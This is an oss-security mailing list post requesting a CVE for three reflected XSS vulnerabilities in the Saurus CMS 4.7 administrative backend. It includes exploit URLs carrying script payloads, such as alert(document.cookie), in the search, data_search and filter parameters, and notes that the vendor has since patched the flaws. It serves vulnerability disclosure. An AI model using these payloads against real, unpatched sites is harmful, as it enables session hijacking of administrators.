|
Message-ID: <CALH-=7wwFG69Z-6XHD-R0UsmHhQ7rj+FSWZmfzPayv6E1kbeUA@mail.gmail.com> Date: Wed, 28 Jan 2015 05:50:26 +0100 From: Steffen Rösemann <steffen.roesemann1986@...il.com> To: oss-security@...ts.openwall.com Subject: CVE-Request -- Saurus CMS v.4.7 (Community Edition, released: 12.08.2014) -- Multiple reflecting XSS vulnerabilities Hi Josh, Steve, vendors, list. I found multiple reflecting XSS vulnerabilities in the administrative backend of the content management system Saurus CMS v. 4.7 (Community Edition, released: 12.08.2014). The parameters used in the following PHP files are prone to reflecting XSS attacks (including exploit examples): user_management.php (vulnerable parameter: "search"): http:// {TARGET}/admin/user_management.php?tmpuser_search=1&tmpgroup_search=1&tmpsearch_subtree=1&search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&user_search=1&group_search=1&group_search=1&flt_role=&keepThis=true&id=&op=&keel=&group_id=1&view=overview_false&user_id=&user_prev_id=&user_next_id= profile_data.php (vulnerable parameter: "data_search"): http:// {TARGET}/admin/profile_data.php?data_search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&profile_search=&profile_id=0 error_log.php (vulnerable parameter: "filter"): http:// {TARGET}/admin/error_log.php?id=&op=&keel=&group_id=1&otsi=1&page=&filter=bla&algus=31.12.2014&lopp=07.01.2015&err_type=&otsi=1&page=&filter=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C!--&algus=31.12.2014&lopp=07.01.2015&err_type= Vendor patched this vulnerability in the latest commit of Saurus CMS v. 4.7 (CE, released: 27.01.2015). Could you please assign a CVE-ID for this? Thank you very much! Greetings from Germany. Steffen Rösemann References: [1] http://www.saurus.info [2] https://github.com/sauruscms/Saurus-CMS-Community-Edition/issues/61 [3] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-05.html [4] https://github.com/sauruscms/Saurus-CMS-Community-Edition/commit/8dec044d0fdabcb9b04e58037623385a97b0d288 [5] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-05.html [6] http://seclists.org/fulldisclosure/2015/Jan/112
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.